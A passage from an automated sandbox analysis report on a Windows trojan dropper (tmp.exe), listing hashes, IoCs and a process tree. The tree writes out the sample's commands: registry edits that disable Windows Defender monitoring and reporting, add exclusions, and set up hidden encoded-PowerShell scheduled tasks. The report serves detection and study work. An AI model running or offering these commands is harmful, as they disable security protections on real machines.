d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c

Analysis

max time kernel
144s
max time network
152s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
27-11-2022 20:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

7.3MB
MD5

96c8cf366a208bb8c718c8adb8fe8f09
SHA1

523c74fd08b2b48f7d9e2f1ded880b3395b7fd09
SHA256

d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c
SHA512

a2bb85b49fd64e3b5d372f1f23c1826233e6ceddf66ec1ea6eae959888e9471de4e602638df1936e7bf69687bf0ee164fb7b94e40c15edce2b31dd47c0d3d5b1
SSDEEP

196608:91O7zHr+QgWi5Hv2fnrwPoi3mzXM0GWZ61mLPwR:3O7/+fWQP2TwPoGGZY1DR

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zmYTWlNURgkpZSQr = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zmYTWlNURgkpZSQr = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JQSUAsxhPrkpC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LWEaAEbWcVdTLtVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NzXptEldKlmGfUJVpfR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hlZelPwcU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qTJuYfusUOEU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RcLzQsxdNdUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RcLzQsxdNdUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JQSUAsxhPrkpC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hlZelPwcU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LWEaAEbWcVdTLtVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zmYTWlNURgkpZSQr = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NzXptEldKlmGfUJVpfR = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qTJuYfusUOEU2 = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\zmYTWlNURgkpZSQr = "0"	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
1260	Install.exe
1872	Install.exe
1672	FERDjBQ.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1140	tmp.exe
1260	Install.exe
1260	Install.exe
1260	Install.exe
1260	Install.exe
1872	Install.exe
1872	Install.exe
1872	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	FERDjBQ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FERDjBQ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FERDjBQ.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bdcFCqLpfQmIysFLcB.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1900	schtasks.exe
584	schtasks.exe
996	schtasks.exe
1476	schtasks.exe
1684	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1576	powershell.EXE
1576	powershell.EXE
1576	powershell.EXE
764	powershell.EXE
764	powershell.EXE
764	powershell.EXE
1740	powershell.EXE
1740	powershell.EXE
1740	powershell.EXE
1640	powershell.EXE
1640	powershell.EXE
1640	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1576	powershell.EXE
Token: SeDebugPrivilege	764	powershell.EXE
Token: SeDebugPrivilege	1740	powershell.EXE
Token: SeDebugPrivilege	1640	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1140 wrote to memory of 1260	1140	tmp.exe	26
PID 1140 wrote to memory of 1260	1140	tmp.exe	26
PID 1140 wrote to memory of 1260	1140	tmp.exe	26
PID 1140 wrote to memory of 1260	1140	tmp.exe	26
PID 1140 wrote to memory of 1260	1140	tmp.exe	26
PID 1140 wrote to memory of 1260	1140	tmp.exe	26
PID 1140 wrote to memory of 1260	1140	tmp.exe	26
PID 1260 wrote to memory of 1872	1260	Install.exe	27
PID 1260 wrote to memory of 1872	1260	Install.exe	27
PID 1260 wrote to memory of 1872	1260	Install.exe	27
PID 1260 wrote to memory of 1872	1260	Install.exe	27
PID 1260 wrote to memory of 1872	1260	Install.exe	27
PID 1260 wrote to memory of 1872	1260	Install.exe	27
PID 1260 wrote to memory of 1872	1260	Install.exe	27
PID 1872 wrote to memory of 1764	1872	Install.exe	29
PID 1872 wrote to memory of 1764	1872	Install.exe	29
PID 1872 wrote to memory of 1764	1872	Install.exe	29
PID 1872 wrote to memory of 1764	1872	Install.exe	29
PID 1872 wrote to memory of 1764	1872	Install.exe	29
PID 1872 wrote to memory of 1764	1872	Install.exe	29
PID 1872 wrote to memory of 1764	1872	Install.exe	29
PID 1872 wrote to memory of 1068	1872	Install.exe	31
PID 1872 wrote to memory of 1068	1872	Install.exe	31
PID 1872 wrote to memory of 1068	1872	Install.exe	31
PID 1872 wrote to memory of 1068	1872	Install.exe	31
PID 1872 wrote to memory of 1068	1872	Install.exe	31
PID 1872 wrote to memory of 1068	1872	Install.exe	31
PID 1872 wrote to memory of 1068	1872	Install.exe	31
PID 1068 wrote to memory of 1552	1068	forfiles.exe	33
PID 1068 wrote to memory of 1552	1068	forfiles.exe	33
PID 1068 wrote to memory of 1552	1068	forfiles.exe	33
PID 1068 wrote to memory of 1552	1068	forfiles.exe	33
PID 1068 wrote to memory of 1552	1068	forfiles.exe	33
PID 1068 wrote to memory of 1552	1068	forfiles.exe	33
PID 1068 wrote to memory of 1552	1068	forfiles.exe	33
PID 1764 wrote to memory of 888	1764	forfiles.exe	34
PID 1764 wrote to memory of 888	1764	forfiles.exe	34
PID 1764 wrote to memory of 888	1764	forfiles.exe	34
PID 1764 wrote to memory of 888	1764	forfiles.exe	34
PID 1764 wrote to memory of 888	1764	forfiles.exe	34
PID 1764 wrote to memory of 888	1764	forfiles.exe	34
PID 1764 wrote to memory of 888	1764	forfiles.exe	34
PID 1552 wrote to memory of 1360	1552	cmd.exe	35
PID 1552 wrote to memory of 1360	1552	cmd.exe	35
PID 1552 wrote to memory of 1360	1552	cmd.exe	35
PID 1552 wrote to memory of 1360	1552	cmd.exe	35
PID 1552 wrote to memory of 1360	1552	cmd.exe	35
PID 1552 wrote to memory of 1360	1552	cmd.exe	35
PID 1552 wrote to memory of 1360	1552	cmd.exe	35
PID 888 wrote to memory of 976	888	cmd.exe	36
PID 888 wrote to memory of 976	888	cmd.exe	36
PID 888 wrote to memory of 976	888	cmd.exe	36
PID 888 wrote to memory of 976	888	cmd.exe	36
PID 888 wrote to memory of 976	888	cmd.exe	36
PID 888 wrote to memory of 976	888	cmd.exe	36
PID 888 wrote to memory of 976	888	cmd.exe	36
PID 1552 wrote to memory of 856	1552	cmd.exe	37
PID 1552 wrote to memory of 856	1552	cmd.exe	37
PID 1552 wrote to memory of 856	1552	cmd.exe	37
PID 1552 wrote to memory of 856	1552	cmd.exe	37
PID 1552 wrote to memory of 856	1552	cmd.exe	37
PID 1552 wrote to memory of 856	1552	cmd.exe	37
PID 1552 wrote to memory of 856	1552	cmd.exe	37
PID 888 wrote to memory of 1056	888	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1140
- C:\Users\Admin\AppData\Local\Temp\7zS3A15.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Users\Admin\AppData\Local\Temp\7zS3FB0.tmp\Install.exe
    .\Install.exe /S /site_id "757674"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1764
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:888
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:976
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1056
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1068
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1552
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1360
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:856
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "glpzbWsVL" /SC once /ST 12:59:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1900
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "glpzbWsVL"
      4⤵
      PID:1876
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "glpzbWsVL"
      4⤵
      PID:1372
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bdcFCqLpfQmIysFLcB" /SC once /ST 20:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\psTRjjIMsrlHlrG\FERDjBQ.exe\" vD /site_id 757674 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:584

C:\Windows\system32\taskeng.exe
taskeng.exe {54208390-9D89-4B2E-8BFE-DDC79A4D9D13} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:764
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1056

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1968

C:\Windows\system32\taskeng.exe
taskeng.exe {369E7EB6-E7FC-4AC8-93D2-4A975FBCC308} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1700
- C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\psTRjjIMsrlHlrG\FERDjBQ.exe
  C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\psTRjjIMsrlHlrG\FERDjBQ.exe vD /site_id 757674 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1672
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ghyjFZNuA" /SC once /ST 10:33:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:996
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ghyjFZNuA"
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ghyjFZNuA"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1724
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:584
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1684
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1760
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gRghxyxkJ" /SC once /ST 14:02:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1476
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gRghxyxkJ"
    3⤵
    PID:524
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gRghxyxkJ"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1544
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1628
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:764
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1996
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:820
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:960
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zmYTWlNURgkpZSQr" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1028
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\zmYTWlNURgkpZSQr\adujSmRs\dkHzGCdWCyBoBplg.wsf"
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\zmYTWlNURgkpZSQr\adujSmRs\dkHzGCdWCyBoBplg.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1100
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQSUAsxhPrkpC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQSUAsxhPrkpC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1736
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NzXptEldKlmGfUJVpfR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1120
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NzXptEldKlmGfUJVpfR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2016
  - - C:\Windows\SysWOW64\reg.exe
